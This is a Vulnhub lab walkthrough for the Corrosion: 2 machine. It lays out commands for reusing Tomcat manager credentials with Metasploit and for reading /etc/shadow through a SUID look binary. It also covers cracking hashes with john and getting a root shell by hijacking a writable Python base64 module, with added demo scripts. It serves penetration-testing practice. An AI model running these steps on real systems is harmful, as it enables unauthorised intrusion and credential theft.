Vulnhub target machine Corrosion: 2 penetration test walkthrough
Vulnhub target machine introduction:
Vulnhub is a large collection of deliberately vulnerable virtual machines. You download an image, import it into a local hypervisor and work through it like a game: penetration testing, privilege escalation, vulnerability exploitation and code auditing.
This is a vulnerable target machine; as usual, the goal is to find the flags.
Difficulty: Medium
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/corrosion/Corrosion2.ova
Vulnhub target machine installation:
After downloading, open the .ova file directly in VMware (File > Open) and import it; an .ova needs no unpacking first.
Detailed explanation of Vulnhub target machine vulnerabilities:
①: Information collection:
On kali, find the target with arp-scan -l (or netdiscover), then scan it:
nmap -sS -sV -T4 -n -p- 192.168.0.100
Attacking machine: kali, IP 192.168.0.104. Target machine IP: 192.168.0.100.
Ports 22, 80 and 8080 are open. 8080 is Tomcat (it serves the default page), 80 is Apache (also the default page). The -p- option scans all 65535 ports; it is slower, but without it a high port such as 8080 would be missed.
Web enumeration with dirb, dirsearch, whatweb, gobuster, nikto:
dirsearch -u http://192.168.0.100 # nothing usable (when the top level gives nothing, scan second-level directories)
dirsearch -u http://192.168.0.100:8080 # this round of enumeration turns up backup.zip and readme.txt
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip # nothing usable
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404
whatweb fingerprints both sites.
The enumeration also gives us a username: randy
Download backup.zip. It is password protected, so crack it the same way as in Corrosion 1 (zip2john + john); the password turns out to be the same one: @administrator_hi5
For the detailed method, see the first article of the Corrosion series: http://t.csdn.cn/XmjAR
The archive contains the configuration file tomcat-users.xml, which holds two credential pairs: manager/melehifokivai
and admin/melehifokivai
Try them on the Tomcat manager application on port 8080: the login succeeds!
②: Tomcat manager upload with msf to get a shell:
Open msfconsole and select the module: use exploit/multi/http/tomcat_mgr_upload
Set the parameters:
set RHOST 192.168.0.100
set HttpPassword melehifokivai
set HttpUsername manager
set RPORT 8080
run
RPORT must be the Tomcat port found by nmap (8080); port 80 is Apache and has no manager application. The module deploys a WAR file through the manager interface, which only works because the account from tomcat-users.xml has the manager role.
Once the session is up, drop into a shell. /home contains three users. We cannot enter jaye's directory, but randy's directory holds user.txt, and that is the first flag!
Next, try switching users: su jaye with the tomcat password (melehifokivai) works! Get a proper terminal with python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd
Since ssh (port 22) is open, log in as jaye over ssh instead; that makes the rest of the work much more convenient.
Now look for SUID binaries, i.e. files that run with the privileges of their owner (root) regardless of who executes them:
find / -perm -u=s -type f 2>/dev/null
③: look reading files it should not:
Among the SUID results there is a copy of look (the first time I have run into this one). A SUID look can display a file the current user has no permission to read:
./look '' "$LFILE"
where LFILE is the file you are not allowed to read. How to use look for unauthorised reads: https://gtfobins.github.io/gtfobins/look/
The trick is the empty search string: look prints every line that begins with the given prefix, and every line begins with the empty string, so the whole file is dumped, and because the binary is SUID root the read happens with root's permissions. That means the root flag can be read directly here:
./look '' /root/root.txt
Read /etc/shadow and /etc/passwd the same way and save both, then merge them with unshadow into the format john expects and crack the result with john. Both files must be copied completely: unshadow joins them on the username, so a user missing from either file gets no hash line and nothing comes out. The dictionary is rockyou.txt (this takes a long time!!):
unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
The password obtained for randy is: 07051986randy
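The look trick and the unshadow step above, as an added example that is not part of the original write-up: a shell script that reads a file through look '' (assumed to be util-linux look on PATH), merges constructed passwd/shadow sample lines the way unshadow does (written in awk so it runs without john installed) and strips locked accounts before the result goes to john. The users and hashes in the samples are made up for the demo.

```shell
#!/bin/sh
# Added example: the step-③ chain, look '' -> unshadow -> john input, on sample
# data. The passwd/shadow lines below are constructed for the demo, not copied
# from the target. Assumes util-linux `look` and awk are available.

# Sample /etc/passwd and /etc/shadow contents (constructed; hashes are dummies).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
randy:x:1000:1000:randy:/home/randy:/bin/bash
jaye:x:1001:1001::/home/jaye:/bin/bash'

SAMPLE_SHADOW='root:!:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
randy:$6$saltsalt$hashhashhash:19000:0:99999:7:::
jaye:$6$othersalt$otherhash:19000:0:99999:7:::'

# write_samples DIR: drop the two sample files into DIR.
write_samples() {
    printf '%s\n' "$SAMPLE_PASSWD" > "$1/passwd"
    printf '%s\n' "$SAMPLE_SHADOW" > "$1/shadow"
}

# read_via_look FILE: the GTFOBins read. The empty search string is a prefix of
# every line, so look prints the whole file; on the target the SUID bit made
# that read happen as root.
read_via_look() {
    look '' "$1"
}

# unshadow_merge PASSWD SHADOW: what `unshadow` does, in awk. Read shadow first
# (NR==FNR) and remember each user's hash, then re-emit the passwd lines with
# the "x" in field 2 replaced by that hash. A user missing from shadow keeps
# "x", which is why both files have to be copied completely.
unshadow_merge() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }
        { if ($1 in hash) $2 = hash[$1]; print }
    ' "$2" "$1"
}

# crackable_only: drop locked or hashless accounts (!, *, empty, unmerged "x").
# john would skip them anyway, but removing them keeps a long rockyou run small.
crackable_only() {
    awk -F: '$2 != "" && $2 != "x" && $2 !~ /^[!*]/'
}

# unshadow_demo: end-to-end run on the sample data; prints the lines you would
# feed to `john --wordlist=rockyou.txt`.
unshadow_demo() {
    demo_dir=$(mktemp -d)
    write_samples "$demo_dir"
    unshadow_merge "$demo_dir/passwd" "$demo_dir/shadow" | crackable_only
    rm -rf "$demo_dir"
}
```

On the target, read_via_look is what replaces cat for /etc/shadow; everything after that runs on the attacking machine, where john is installed.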
④: sudo running randombase64.py, privilege escalation
After logging in as randy, another round of information collection (id, whoami, sudo -l) shows that sudo allows randy to run one script as root: /home/randy/randombase64.py, with the interpreter /usr/bin/python3.8.
The script imports the base64 module, and base64.py in the python3.8 library directory is writable. So we leave the script alone and write a shell launcher into the base64 module instead: when sudo runs the script as root, the import executes our code. First find the file, then edit it with vi or nano (Ctrl+X to exit nano; it took a while the first time):
cd /usr/lib/python3.8
ls -al base* # find base64.py and write the following content into it
import os
os.system("/bin/bash")
sudo /usr/bin/python3.8 /home/randy/randombase64.py # run it; python3.8 is what is used here, other versions can be tried too, whichever succeeds. The interpreter and script path must match what sudo -l lists exactly, otherwise sudo refuses the command.
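The base64.py hijack from step ④, as an added example that is not the author's or the target's code: a shell script that rebuilds the situation in a scratch directory, with a stand-in victim script next to a planted base64.py instead of in /usr/lib/python3.8, plus the check a tester runs to find such writable import locations. It assumes python3 on PATH; no sudo is involved, the point is only to show that the import alone does the work.

```shell
#!/bin/sh
# Added example: the step-④ module hijack without sudo, in a scratch directory.
# Constructed stand-ins: randombase64.py plays /home/randy/randombase64.py and
# the planted base64.py plays the writable /usr/lib/python3.8/base64.py.
# Assumes python3 is on PATH.

# make_lab: create a directory holding the victim script; print its path.
make_lab() {
    lab=$(mktemp -d)
    printf '%s\n' 'import base64' \
        'print(base64.b64encode(b"corrosion").decode())' > "$lab/randombase64.py"
    echo "$lab"
}

# run_clean: nothing planted, the real stdlib base64 answers (Y29ycm9zaW9u).
run_clean() {
    d=$(make_lab)
    python3 "$d/randombase64.py"
    rm -rf "$d"
}

# run_hijacked: plant base64.py in the script's directory. That directory is
# sys.path[0] and is searched before the standard library, so `import base64`
# loads our file; on the target the writable location was the stdlib directory
# itself, but any earlier sys.path entry you can write to behaves the same.
# The module's top-level code runs at import time, before the script does
# anything: on the target that line was os.system("/bin/bash") and, under
# sudo, a root shell. Here it leaves a marker and replaces b64encode.
run_hijacked() {
    d=$(make_lab)
    printf '%s\n' \
        'import pathlib' \
        'pathlib.Path(__file__).with_name("marker").write_text("import-time code ran")' \
        'def b64encode(data):' \
        '    return b"planted-code-ran"' > "$d/base64.py"
    if python3 "$d/randombase64.py" && [ -f "$d/marker" ]; then
        status=0
    else
        status=1
    fi
    rm -rf "$d"
    return $status
}

# writable_syspath [PYTHON]: the check to run on a target. Every sys.path entry
# that the sudo-allowed interpreter searches and that you can write to is a
# hijack point; on the target /usr/lib/python3.8 would show up here.
writable_syspath() {
    py=${1:-python3}
    "$py" -c 'import sys; print("\n".join(p for p in sys.path if p))' |
    while IFS= read -r p; do
        if [ -w "$p" ]; then echo "writable: $p"; fi
    done
}
```

Run writable_syspath /usr/bin/python3.8 with the exact interpreter sudo -l names: a different python on PATH can have a different sys.path, and a directory that is writable for one is not necessarily writable for the other.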
⑤: Get the flag:
With the root shell the root flag is obtained, and the penetration in this article is over. Thank you for reading!!
Vulnhub target penetration summary:
The difficulty of this target machine is a bit above medium, because it is more involved than usual:
1. Information collection: arp-scan -l to obtain the IP address and nmap for the ports; web scanning tools such as nikto, dirb, dirbuster, whatweb, ffuf; and F12 to look at the page source.
2. The MSF exploit/multi/http/tomcat_mgr_upload module to get a shell (you need to know the account and password).
3. Cracking the zip with zip2john and john, or with fcrackzip (a tool for cracking archives), and using a SUID look to read files you are not authorised to read: ./look '' filename
sudo privilege escalation by writing a shell into base64.py (new knowledge point!)
4. A command-level route to root that I will not demonstrate here, look it up if you are interested: Linux Polkit
CVE-2021-4034
The Corrosion series is over. It has been a very rewarding day after learning so many knowledge points (Yeah!)
Writing this was not easy; I hope it helps everyone. If you liked it, please like, favourite and follow. Your happiness is my greatest happiness!!!